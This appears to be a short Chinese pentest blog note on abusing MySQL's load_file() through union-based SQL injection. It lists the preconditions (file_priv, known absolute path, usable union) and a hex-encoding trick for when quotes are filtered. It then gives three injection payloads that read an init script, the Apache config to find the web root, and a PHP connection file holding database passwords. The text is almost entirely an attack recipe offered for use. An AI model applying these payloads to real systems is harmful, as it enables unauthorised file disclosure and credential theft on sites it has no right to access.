美文网首页Pentest
load_file()的使用

load_file()的使用

作者: cws | 来源:发表于2016-07-12 20:13 被阅读21次

    条件:

    1. 要有file_priv权限
    2. 知道文件绝对路径
    3. 能使用union
    4. 对web目录有读权限  
    注:若过滤了单引号,则可以将函数中的字符进行hex编码
    

    一般步骤

    1. 读/etc/init.d下的东西,这里有配置文件路径
    ?id=1' union select 1,2,load_file('/etc/init.d/httpd')
    
    1. 得到web安装路径
    ?id=1' union select 1,2,load_file('/etc/apache/conf/httpd.conf')
    
    1. 读取密码文件
    ?id=1' union select 1,2,load_file('var/www/html/xxx.com/php/conn.inc.php')
    

    相关文章

      网友评论

        本文标题:load_file()的使用

        本文链接:https://www.haomeiwen.com/subject/ekrsjttx.html